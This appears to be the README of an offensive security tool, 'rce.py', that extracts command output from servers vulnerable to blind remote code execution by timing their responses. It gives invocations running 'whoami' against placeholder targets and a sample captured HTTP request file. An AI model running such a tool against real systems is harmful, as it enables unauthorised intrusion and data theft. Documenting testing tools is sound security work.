A Python-based program for Time-based/Blind Remote Code Execution (RCE). The main objective of this program is to extract the data that is not visible and/or not returned in the response of vulnerable target. It uses time-based techniques by sending a payload to the target with a command specified and then waiting for its response.
There are two ways to execute.
By Arguments:
python rce.py -t "https://www.site.com?vuln=" -c "whoami" -m "POST"
By File:
python rce.py -f "/locate/request.txt" -c "whoami"
/locate/request.txt
POST /vuln?x= HTTP/2
Host: site.com
Content-Length: 21
Sec-Ch-Ua-Platform: “Linux”
Accept-Language: en-US,en;q=0.9
Content-Type: application/json
Referer: https://site.com/vuln?x=
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
{
product_id:“507f1f77bcf86cd799439011”,
category:“bar_foo”,
}
Request Header File. We can get it from our Burpsuite, Caido, Http Header or Tamper…
Customized headers and the data you want to pass in your request.
python rce.py -t http://site.com/vuln?x= -c "whoami" -m "POST" -d 10 --Headers "['X-Host: server.example.com', 'Authorization: Bearer eyJhbG']" --json "{product_id:'507f1f77bcf86cd799439011',category:'bar_foo'}"
✨by: thejolotoproject ✨
MIT